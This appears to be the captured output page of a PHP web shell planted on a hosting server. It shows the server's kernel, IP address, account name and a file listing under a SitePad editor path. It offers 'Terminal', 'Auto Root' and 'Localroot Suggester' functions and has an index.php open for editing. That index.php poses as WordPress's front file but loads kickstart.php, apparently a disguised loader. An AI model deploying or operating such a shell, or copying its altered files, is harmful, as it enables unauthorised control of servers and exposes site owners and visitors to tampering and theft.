Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
sitepad /
editor /
Delete
Unzip
Name
Size
Permission
Date
Action
site-admin
[ DIR ]
drwxr-xr-x
2025-10-16 04:26
site-data
[ DIR ]
drwxr-xr-x
2025-10-16 04:26
site-inc
[ DIR ]
drwxr-xr-x
2025-10-16 04:26
config.php
3.72
KB
-rw-r--r--
2025-10-14 10:00
cron.php
3.76
KB
-rw-r--r--
2025-10-14 10:00
index.php
548
B
-rw-r--r--
2025-10-14 10:00
kickstart.php
19.57
KB
-rw-r--r--
2025-10-14 10:00
license.txt
234
B
-rw-r--r--
2025-10-14 10:00
login.php
37.96
KB
-rw-r--r--
2025-10-14 10:00
Save
Rename
<?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); $wp_did_header = true; // Load the WordPress library. require_once( dirname( __FILE__ ) . '/kickstart.php' ); // Set up the WordPress query. wp(); // Load the theme template. require_once( ABSPATH . WPINC . '/template-loader.php' );